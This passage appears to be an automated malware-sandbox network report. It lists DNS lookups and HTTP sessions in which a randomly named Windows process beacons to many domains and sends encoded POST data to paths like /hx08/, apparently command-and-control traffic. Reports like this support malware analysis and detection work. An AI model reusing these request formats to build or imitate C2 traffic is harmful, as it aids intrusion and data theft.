                                May 28, 2024 07:18:54.501610041 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:54.506642103 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.506664038 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.950639963 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:54.950751066 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:56.554537058 CEST4976380192.168.2.63.33.130.190
                                May 28, 2024 07:18:56.563266993 CEST80497633.33.130.190192.168.2.6
                                May 28, 2024 07:18:57.571978092 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.579929113 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:57.580033064 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.581764936 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:57.589044094 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062290907 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062423944 CEST80497643.33.130.190192.168.2.6
                                May 28, 2024 07:18:58.062472105 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:58.064677954 CEST4976480192.168.2.63.33.130.190
                                May 28, 2024 07:18:58.069515944 CEST80497643.33.130.190192.168.2.6

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 28, 2024 07:15:19.203845978 CEST5216353192.168.2.61.1.1.1
                                May 28, 2024 07:15:19.243500948 CEST53521631.1.1.1192.168.2.6
                                May 28, 2024 07:15:35.962555885 CEST5106653192.168.2.61.1.1.1
                                May 28, 2024 07:15:35.974420071 CEST53510661.1.1.1192.168.2.6
                                May 28, 2024 07:15:50.353135109 CEST6490353192.168.2.61.1.1.1
                                May 28, 2024 07:15:50.383105040 CEST53649031.1.1.1192.168.2.6
                                May 28, 2024 07:16:04.728287935 CEST5577053192.168.2.61.1.1.1
                                May 28, 2024 07:16:04.740528107 CEST53557701.1.1.1192.168.2.6
                                May 28, 2024 07:16:12.806751013 CEST6435653192.168.2.61.1.1.1
                                May 28, 2024 07:16:12.932435036 CEST53643561.1.1.1192.168.2.6
                                May 28, 2024 07:16:26.499382973 CEST5275653192.168.2.61.1.1.1
                                May 28, 2024 07:16:26.562767982 CEST53527561.1.1.1192.168.2.6
                                May 28, 2024 07:16:39.823669910 CEST5663653192.168.2.61.1.1.1
                                May 28, 2024 07:16:39.835678101 CEST53566361.1.1.1192.168.2.6
                                May 28, 2024 07:16:53.186188936 CEST5434553192.168.2.61.1.1.1
                                May 28, 2024 07:16:53.324561119 CEST53543451.1.1.1192.168.2.6
                                May 28, 2024 07:17:06.450376034 CEST5218353192.168.2.61.1.1.1
                                May 28, 2024 07:17:06.736654997 CEST53521831.1.1.1192.168.2.6
                                May 28, 2024 07:17:19.870450974 CEST5106753192.168.2.61.1.1.1
                                May 28, 2024 07:17:20.383970022 CEST53510671.1.1.1192.168.2.6
                                May 28, 2024 07:17:33.760253906 CEST5986953192.168.2.61.1.1.1
                                May 28, 2024 07:17:33.821358919 CEST53598691.1.1.1192.168.2.6
                                May 28, 2024 07:17:47.090984106 CEST5749153192.168.2.61.1.1.1
                                May 28, 2024 07:17:47.261409044 CEST53574911.1.1.1192.168.2.6
                                May 28, 2024 07:18:01.338180065 CEST5270953192.168.2.61.1.1.1
                                May 28, 2024 07:18:01.704238892 CEST53527091.1.1.1192.168.2.6
                                May 28, 2024 07:18:14.869710922 CEST5862953192.168.2.61.1.1.1
                                May 28, 2024 07:18:15.189414024 CEST53586291.1.1.1192.168.2.6
                                May 28, 2024 07:18:49.355304003 CEST5195353192.168.2.61.1.1.1
                                May 28, 2024 07:18:49.367676973 CEST53519531.1.1.1192.168.2.6

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 28, 2024 07:15:19.203845978 CEST192.168.2.61.1.1.10x6185Standard query (0)www.ilodezu.comA (IP address)IN (0x0001)false
                                May 28, 2024 07:15:35.962555885 CEST192.168.2.61.1.1.10xc916Standard query (0)www.vpachurch.org.ukA (IP address)IN (0x0001)false
                                May 28, 2024 07:15:50.353135109 CEST192.168.2.61.1.1.10xc363Standard query (0)www.shopnaya.frA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:04.728287935 CEST192.168.2.61.1.1.10x8314Standard query (0)www.dolcegusto-quiz.funA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:12.806751013 CEST192.168.2.61.1.1.10xacd2Standard query (0)www.etrading.cloudA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:26.499382973 CEST192.168.2.61.1.1.10xb1beStandard query (0)www.ceo-retreats.co.ukA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:39.823669910 CEST192.168.2.61.1.1.10x4b03Standard query (0)www.mavonorm-global.ukA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:53.186188936 CEST192.168.2.61.1.1.10x9e7cStandard query (0)www.adhdphotography.comA (IP address)IN (0x0001)false
                                May 28, 2024 07:17:06.450376034 CEST192.168.2.61.1.1.10x15f4Standard query (0)www.allgiftedmalaysia.comA (IP address)IN (0x0001)false
                                May 28, 2024 07:17:19.870450974 CEST192.168.2.61.1.1.10xac30Standard query (0)www.shortput.topA (IP address)IN (0x0001)false
                                May 28, 2024 07:17:33.760253906 CEST192.168.2.61.1.1.10x8543Standard query (0)www.cuddle-paws.co.ukA (IP address)IN (0x0001)false
                                May 28, 2024 07:17:47.090984106 CEST192.168.2.61.1.1.10x5341Standard query (0)www.home-stroi0m.ruA (IP address)IN (0x0001)false
                                May 28, 2024 07:18:01.338180065 CEST192.168.2.61.1.1.10x8aa4Standard query (0)www.betopfloor.comA (IP address)IN (0x0001)false
                                May 28, 2024 07:18:14.869710922 CEST192.168.2.61.1.1.10x80b4Standard query (0)www.bade.inkA (IP address)IN (0x0001)false
                                May 28, 2024 07:18:49.355304003 CEST192.168.2.61.1.1.10xcbceStandard query (0)www.futurereadyteaming.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 28, 2024 07:15:19.243500948 CEST1.1.1.1192.168.2.60x6185No error (0)www.ilodezu.com188.114.97.3A (IP address)IN (0x0001)false
                                May 28, 2024 07:15:19.243500948 CEST1.1.1.1192.168.2.60x6185No error (0)www.ilodezu.com188.114.96.3A (IP address)IN (0x0001)false
                                May 28, 2024 07:15:35.974420071 CEST1.1.1.1192.168.2.60xc916No error (0)www.vpachurch.org.ukvpachurch.org.ukCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:15:35.974420071 CEST1.1.1.1192.168.2.60xc916No error (0)vpachurch.org.uk3.33.130.190A (IP address)IN (0x0001)false
                                May 28, 2024 07:15:35.974420071 CEST1.1.1.1192.168.2.60xc916No error (0)vpachurch.org.uk15.197.148.33A (IP address)IN (0x0001)false
                                May 28, 2024 07:15:50.383105040 CEST1.1.1.1192.168.2.60xc363No error (0)www.shopnaya.fr212.227.172.254A (IP address)IN (0x0001)false
                                May 28, 2024 07:16:04.740528107 CEST1.1.1.1192.168.2.60x8314Server failure (2)www.dolcegusto-quiz.funnonenoneA (IP address)IN (0x0001)false
                                May 28, 2024 07:16:12.932435036 CEST1.1.1.1192.168.2.60xacd2No error (0)www.etrading.cloud94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:16:12.932435036 CEST1.1.1.1192.168.2.60xacd2No error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                May 28, 2024 07:16:26.562767982 CEST1.1.1.1192.168.2.60xb1beNo error (0)www.ceo-retreats.co.uk46.30.215.104A (IP address)IN (0x0001)false
                                May 28, 2024 07:16:39.835678101 CEST1.1.1.1192.168.2.60x4b03No error (0)www.mavonorm-global.ukmavonorm-global.ukCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:16:39.835678101 CEST1.1.1.1192.168.2.60x4b03No error (0)mavonorm-global.uk92.205.15.157A (IP address)IN (0x0001)false
                                May 28, 2024 07:16:53.324561119 CEST1.1.1.1192.168.2.60x9e7cNo error (0)www.adhdphotography.comadhdphotography.comCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:16:53.324561119 CEST1.1.1.1192.168.2.60x9e7cNo error (0)adhdphotography.com76.223.67.189A (IP address)IN (0x0001)false
                                May 28, 2024 07:16:53.324561119 CEST1.1.1.1192.168.2.60x9e7cNo error (0)adhdphotography.com13.248.213.45A (IP address)IN (0x0001)false
                                May 28, 2024 07:17:06.736654997 CEST1.1.1.1192.168.2.60x15f4No error (0)www.allgiftedmalaysia.com216.40.34.41A (IP address)IN (0x0001)false
                                May 28, 2024 07:17:20.383970022 CEST1.1.1.1192.168.2.60xac30No error (0)www.shortput.top203.161.43.227A (IP address)IN (0x0001)false
                                May 28, 2024 07:17:33.821358919 CEST1.1.1.1192.168.2.60x8543No error (0)www.cuddle-paws.co.ukcuddle-paws.co.ukCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:17:33.821358919 CEST1.1.1.1192.168.2.60x8543No error (0)cuddle-paws.co.uk185.229.21.229A (IP address)IN (0x0001)false
                                May 28, 2024 07:17:47.261409044 CEST1.1.1.1192.168.2.60x5341No error (0)www.home-stroi0m.ru178.63.50.103A (IP address)IN (0x0001)false
                                May 28, 2024 07:18:01.704238892 CEST1.1.1.1192.168.2.60x8aa4No error (0)www.betopfloor.combetopfloor.comCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:18:01.704238892 CEST1.1.1.1192.168.2.60x8aa4No error (0)betopfloor.com108.179.192.228A (IP address)IN (0x0001)false
                                May 28, 2024 07:18:15.189414024 CEST1.1.1.1192.168.2.60x80b4No error (0)www.bade.ink149.88.84.60A (IP address)IN (0x0001)false
                                May 28, 2024 07:18:49.367676973 CEST1.1.1.1192.168.2.60xcbceNo error (0)www.futurereadyteaming.comfuturereadyteaming.comCNAME (Canonical name)IN (0x0001)false
                                May 28, 2024 07:18:49.367676973 CEST1.1.1.1192.168.2.60xcbceNo error (0)futurereadyteaming.com3.33.130.190A (IP address)IN (0x0001)false
                                May 28, 2024 07:18:49.367676973 CEST1.1.1.1192.168.2.60xcbceNo error (0)futurereadyteaming.com15.197.148.33A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.ilodezu.com
                                • www.vpachurch.org.uk
                                • www.shopnaya.fr
                                • www.etrading.cloud
                                • www.ceo-retreats.co.uk
                                • www.mavonorm-global.uk
                                • www.adhdphotography.com
                                • www.allgiftedmalaysia.com
                                • www.shortput.top
                                • www.cuddle-paws.co.uk
                                • www.home-stroi0m.ru
                                • www.betopfloor.com
                                • www.bade.ink
                                • www.futurereadyteaming.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649711188.114.97.3801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:19.255884886 CEST475OUTGET /07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ= HTTP/1.1
                                Host: www.ilodezu.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:20.921492100 CEST539INHTTP/1.1 567 unknown
                                Date: Tue, 28 May 2024 05:15:20 GMT
                                Content-Length: 17
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m6mVSsi7gdUdjw7eVToqE9ze9zuDS1qUiNpFq3MQlhSc8r4q56mx4VIE7xmirjAIBkdqtPV4RbxAAGQD3gF6L91X3hKuU1ZN8q4mtnaNNqpPKjCZDdgDttPmN9zyjPQ8jOI%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88abc427e965425b-EWR
                                alt-svc: h2=":443"; ma=60
                                Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                Data Ascii: Request too large


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.6497123.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:35.984015942 CEST749OUTPOST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 7a 71 71 36 67 42 70 62 6c 6a 6b 31 39 75 50 72 47 2b 64 55 4e 36 78 6a 74 42 7a 68 39 74 50 6f 59 71 62 38 48 51 43 58 6f 79 30 4c 37 62 6b 48 6e 75 75 41 75 33 4a 5a 50 77 77 2b 4d 45 36 55 41 47 62 30 56 6a 45 52 38 56 50 68 77 4d 4b 6c 51 65 30 36 69 37 30 33 63 2b 50 6d 76 46 79 53 75 55 45 52 64 64 6a 68 7a 30 33 43 6a 50 38 34 42 6b 4d 7a 4e 32 61 6c 4d 2b 79 4d 37 4f 72 4d 47 66 71 51 58 46 42 65 52 58 64 73 4b 45 43 49 65 49 5a 7a 75 48 68 76 30 49 6c 7a 44 67 63 70 32 76 6a 73 58 76 62 37 6a 31 67 35 39 68 6f 56 6a 6c 6c 4e 52 57 48 64 64 41 2f 49 54 71 4d 4f 47 52 58 64 71 65 4d 6d 35 36 6a 69
                                Data Ascii: jTZPp=zqq6gBpbljk19uPrG+dUN6xjtBzh9tPoYqb8HQCXoy0L7bkHnuuAu3JZPww+ME6UAGb0VjER8VPhwMKlQe06i703c+PmvFySuUERddjhz03CjP84BkMzN2alM+yM7OrMGfqQXFBeRXdsKECIeIZzuHhv0IlzDgcp2vjsXvb7j1g59hoVjllNRWHddA/ITqMOGRXdqeMm56ji


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.6497133.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:38.516274929 CEST773OUTPOST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 7a 71 71 36 67 42 70 62 6c 6a 6b 31 38 50 2f 72 48 5a 78 55 50 61 78 67 78 52 7a 68 6f 64 50 73 59 71 66 38 48 56 7a 4b 6f 67 67 4c 36 36 34 48 6d 71 36 41 76 33 4a 5a 42 51 77 69 52 55 36 66 41 47 58 47 56 6a 6f 52 38 56 62 68 77 4a 32 6c 51 74 4d 39 67 72 30 78 45 4f 50 67 69 6c 79 53 75 55 45 52 64 64 33 4c 7a 30 76 43 6a 2f 67 34 41 42 67 30 45 57 61 6d 61 75 79 4d 78 75 72 41 47 66 72 67 58 41 68 30 52 56 6c 73 4b 45 79 49 65 35 5a 38 31 33 68 54 77 49 6b 46 4f 42 34 6a 32 70 36 4a 51 2b 61 61 69 55 34 42 38 58 70 50 2f 57 6c 75 44 47 6e 66 64 43 6e 36 54 4b 4d 6b 45 52 76 64 34 4a 41 42 32 4f 47 42 47 58 64 67 46 75 32 30 77 47 2b 72 62 57 78 6e 7a 78 6a 35 30 77 3d 3d
                                Data Ascii: jTZPp=zqq6gBpbljk18P/rHZxUPaxgxRzhodPsYqf8HVzKoggL664Hmq6Av3JZBQwiRU6fAGXGVjoR8VbhwJ2lQtM9gr0xEOPgilySuUERdd3Lz0vCj/g4ABg0EWamauyMxurAGfrgXAh0RVlsKEyIe5Z813hTwIkFOB4j2p6JQ+aaiU4B8XpP/WluDGnfdCn6TKMkERvd4JAB2OGBGXdgFu20wG+rbWxnzxj50w==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.6497143.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:42.330183029 CEST1786OUTPOST /hx08/ HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.vpachurch.org.uk
                                Referer: http://www.vpachurch.org.uk/hx08/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 7a 71 71 36 67 42 70 62 6c 6a 6b 31 38 50 2f 72 48 5a 78 55 50 61 78 67 78 52 7a 68 6f 64 50 73 59 71 66 38 48 56 7a 4b 6f 68 59 4c 36 49 63 48 6e 49 53 41 73 33 4a 5a 4a 77 77 79 52 55 36 65 41 47 4f 50 56 6a 55 42 38 57 6a 68 69 62 4f 6c 62 38 4d 39 70 72 30 78 4e 75 50 6c 76 46 79 39 75 55 56 59 64 64 6e 4c 7a 30 76 43 6a 2b 51 34 47 55 4d 30 49 32 61 6c 4d 2b 79 41 37 4f 72 73 47 62 47 59 58 41 74 4f 53 6b 46 73 4b 67 65 49 63 72 78 38 35 33 68 56 39 6f 6b 4e 4f 42 46 35 32 74 53 6a 51 2b 76 33 69 57 6b 42 77 54 49 6b 6a 53 52 32 62 6e 54 74 4b 6c 4c 75 59 39 4d 41 46 77 7a 79 78 36 41 6e 77 50 47 78 49 44 45 38 48 4d 7a 48 78 46 44 43 59 51 51 6d 7a 46 69 63 72 43 66 31 74 46 35 49 75 75 43 75 68 52 30 65 4c 78 65 46 48 79 51 65 49 54 67 4b 2f 46 63 4a 4a 7a 71 4c 7a 75 71 54 63 31 6c 36 36 33 65 4d 68 51 77 47 31 69 6e 70 7a 52 31 49 2f 69 6b 51 55 4b 6a 30 6a 51 62 72 2f 78 34 34 76 71 4b 36 32 67 4f 51 61 33 57 6a 76 66 6c 32 49 79 4d 4c 6f 70 62 4d 56 46 4c 4f 4d 4f 50 58 [TRUNCATED]
                                Data Ascii: jTZPp=zqq6gBpbljk18P/rHZxUPaxgxRzhodPsYqf8HVzKohYL6IcHnISAs3JZJwwyRU6eAGOPVjUB8WjhibOlb8M9pr0xNuPlvFy9uUVYddnLz0vCj+Q4GUM0I2alM+yA7OrsGbGYXAtOSkFsKgeIcrx853hV9okNOBF52tSjQ+v3iWkBwTIkjSR2bnTtKlLuY9MAFwzyx6AnwPGxIDE8HMzHxFDCYQQmzFicrCf1tF5IuuCuhR0eLxeFHyQeITgK/FcJJzqLzuqTc1l663eMhQwG1inpzR1I/ikQUKj0jQbr/x44vqK62gOQa3Wjvfl2IyMLopbMVFLOMOPXd5Tv6LIcLWcUxDBf1+N1h3TW98UHKcOLRQD1QfjnKKTAYW8mTWK0j0Wy0P8c5TgDSKcD1bn0etGQJLZOeltK/8vGk64JmDkkshrbTasWwxSDyZcMpr95L0FVhpIruT70zEtD1pvthVGq6IQcBGUyLVRIzPBuK0Pqj/9U+4Cp3ohnzKL3Yf42EdM57f1kS+O+kL/iWHALrMvvDHJxlg7C+ZE3M7FzDiiG7vECTFrZXZObUnKnqczM4X8hzPoLQ2eSx46H9W1vw2TSr1k0o7NZ+yE9rOOzfky42dTRN2EbALzQ1lqtCY/jYA2g83KnRylJ7eCfwdtpGXe9PFWMQFwtsMVsRnK+P7vEzFbAm6HntjjCB0mo0en00mcJ6Vz2VLu7MeUXJEolajnlnjfCwdLZevIcljo8AN+3HX4YjPRDUc99Qk9ELrISsAp4YQyAy4X+b7iN/Tz7zFilbqvITGydcyPQTQvxTFO/Hcmhw+wpmcLkkMyFnc9lHcTTGQylabv6spdIIbqcxctpRJIlTBIJfRlnOiXQxhHTWWRw3piqLtuXHjXABYqSbbsgJj16YP/KZYuh63LXJC6P65IgEUPSrgMzSmPESAsCiliVoHqsOR7e8Q6mZQDW3QLJtXpGKYtbMcheht0n1LJP822HUC1j5KkyD46/jJapY/ [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.6497153.33.130.190801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:44.859586954 CEST480OUTGET /hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0 HTTP/1.1
                                Host: www.vpachurch.org.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:15:45.333337069 CEST408INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:15:45 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 54 5a 50 70 3d 2b 6f 43 61 6a 31 41 36 71 45 67 49 31 39 37 72 4a 4f 74 37 49 65 38 77 73 54 32 51 75 61 58 76 52 4f 72 54 62 55 61 6a 2f 6a 34 30 31 2b 55 34 2f 75 69 68 79 58 51 4c 41 48 42 51 61 58 2b 6f 44 53 7a 35 5a 77 51 38 68 33 58 39 34 5a 50 68 54 72 41 50 75 4b 55 78 4b 70 2f 49 75 32 36 4d 75 42 6c 45 49 63 37 71 35 45 7a 2f 35 73 34 66 44 41 63 46 49 58 6d 45 64 37 71 76 77 71 54 63 42 61 43 41 43 67 55 3d 26 35 4c 30 3d 32 62 43 50 79 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0"}</script></head></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.649717212.227.172.254801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:50.391688108 CEST734OUTPOST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 5a 6e 6c 39 61 37 79 57 4e 30 52 66 42 43 6f 2f 55 6e 4c 74 34 36 70 2b 56 71 66 63 6d 61 6b 71 68 69 51 2b 48 6a 68 7a 53 4e 43 76 74 68 33 71 5a 2f 49 68 66 75 6d 56 75 6a 77 77 6a 6f 6f 6f 53 32 53 79 57 30 49 37 68 63 47 37 78 2b 55 52 6f 42 74 6c 6d 50 4c 47 39 41 33 37 47 55 62 33 72 6e 66 4b 39 67 36 48 61 65 57 4a 39 6a 50 73 47 35 63 46 58 72 45 66 46 65 69 39 49 53 36 31 4e 68 7a 75 62 35 2f 59 64 36 67 32 73 30 2f 4f 51 51 71 33 36 66 49 7a 56 52 69 46 79 45 78 63 6a 61 74 30 38 56 45 6e 38 31 4f 47 44 65 42 6a 4b 38 6b 6a 70 6b 67 64 48 76 6c 31 4e 62 2f 57 4f 79 52 46 67 47 65 36 69 4f 46 38
                                Data Ascii: jTZPp=Znl9a7yWN0RfBCo/UnLt46p+VqfcmakqhiQ+HjhzSNCvth3qZ/IhfumVujwwjoooS2SyW0I7hcG7x+URoBtlmPLG9A37GUb3rnfK9g6HaeWJ9jPsG5cFXrEfFei9IS61Nhzub5/Yd6g2s0/OQQq36fIzVRiFyExcjat08VEn81OGDeBjK8kjpkgdHvl1Nb/WOyRFgGe6iOF8
                                May 28, 2024 07:15:51.055104017 CEST423INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Tue, 28 May 2024 05:15:50 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.shopnaya.fr/9rbi/
                                Expires: Tue, 28 May 2024 05:35:50 GMT
                                Cache-Control: max-age=1200
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.649718212.227.172.254801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:15:52.921988964 CEST758OUTPOST /9rbi/ HTTP/1.1
                                Host: www.shopnaya.fr
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.shopnaya.fr
                                Referer: http://www.shopnaya.fr/9rbi/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
